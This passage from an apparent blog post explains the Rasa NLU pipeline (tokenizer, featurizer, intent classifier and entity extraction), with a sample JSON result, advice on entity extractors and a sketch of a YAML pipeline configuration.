  1. The tokenizer is used to transform input words, sentences or paragraphs into single word tokens. Unnecessary punctuation is removed, and stop words can be removed as well.
  2. The featurizer is used to create input vectors from the tokens. They serve as features for the neural net. The simplest form of an input vector is one-hot.
  3. The intent classifier is the part of the neural net responsible for decision making. It decides which intent is most likely meant by the user. This is called multiclass classification.
  4. Finally, named entity recognition can be used to extract information like e-mail addresses from a text. In terms of Rasa (and dialogue systems) this is called entity extraction.

In the following example (from Rasa) you can see how the individual parts work together to provide information about intent and entities:

{
    "text": "I am looking for Chinese food",
    "entities": [
        {"start": 17, "end": 24, "value": "chinese", "entity": "cuisine", "extractor": "ner_crf", "confidence": 0.864}
    ],
    "intent": {"confidence": 0.6485910906220309, "name": "restaurant_search"},
    "intent_ranking": [
        {"confidence": 0.6485910906220309, "name": "restaurant_search"},
        {"confidence": 0.1416153159565678, "name": "affirm"}
    ]
}

As mentioned by Rasa itself, intent_classifier_tensorflow_embedding can be used for intent classification. It is based on the StarSpace: Embed All The Things! paper published by Facebook Research, which presents a completely new approach to measuring meaning similarity and generates awesome results!

For named entity recognition you have to make a decision: Either you use common pre-trained entities, or you use custom entities like “type_of_coffee”. Pre-trained entities can be one of the following:

  • ner_spaCy: Places, Dates, People, Organisations
  • ner_duckling: Dates, Amounts of Money, Durations, Distances, Ordinals

Those two components perform very well in recognizing the given types, but for custom entities they perform rather badly. Instead you should use ner_mitie or ner_crf and collect some more training data than usual. If your entities have a specific structure that can be parsed by a regex, make sure to add intent_entity_featurizer_regex to your pipeline (see the pipeline sketch below)! In this Github Gist I provided a short script which helps you to create training samples for a custom entity. You just pass some sentences for an intent into it and combine them with sample values of your custom entity. It will then create training samples for each of your sample values.
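To make this concrete, a custom pipeline configuration could look roughly like the sketch below. The component names correspond to the Rasa NLU 0.x components discussed in this post, and the file name nlu_config.yml is just a common convention; treat the whole thing as a starting point rather than a copy-paste recipe:

# nlu_config.yml (sketch)
language: "en"

pipeline:
- name: "tokenizer_whitespace"
- name: "intent_entity_featurizer_regex"
- name: "intent_featurizer_count_vectors"
- name: "intent_classifier_tensorflow_embedding"
- name: "ner_crf"
- name: "ner_synonyms"

Depending on your entities you could swap ner_crf for ner_mitie, or add ner_duckling / ner_spacy for the pre-trained entity types mentioned above.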

That’s it 🙂 If you have any questions about Rasa or this blogpost don’t hesitate to contact me! Have a nice week and stay tuned for our next post.

Greets,
Domi
